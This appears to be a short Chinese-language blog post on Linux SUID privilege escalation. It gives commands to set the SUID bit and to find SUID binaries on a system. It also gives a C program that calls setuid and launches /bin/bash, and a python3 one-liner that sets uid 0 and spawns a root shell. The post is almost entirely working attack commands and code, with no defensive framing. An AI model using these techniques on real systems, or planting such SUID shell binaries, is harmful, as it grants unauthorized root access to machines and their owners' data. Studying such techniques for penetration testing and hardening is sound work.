SUID

一、权限

二、S权限

chmod 4755 文件名
chmod u+s  文件名      //u代表当前用户

三、查找SUID权限

//find代表查找,/代表根目录,-perm代表权限,-u代表当前用户,s代表s权限,type代表类型,f为二进制文件,2代表错误,/dev/null代表文件
find / -perm -u=s -type f 2>/dev/null

四、python开启http服务

python -m SimpleHTTPServer

五、脚本提权

1、创建一个脚本

#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>

int main()
{
	setuid(geteuid());
	system("/bin/bash");
	return 0;

}

2、gcc编译然后给他权限

3、切换成普通用户提权

六、python提权

查看python是否是SUID

ls -alh /usr/bin/python3.7

python3 -c "import os;os.setuid(0);os.system('/bin/bash')"

whoami

posted @ 2020-12-15 16:38  lnterpreter  阅读(140)  评论(0编辑  收藏  举报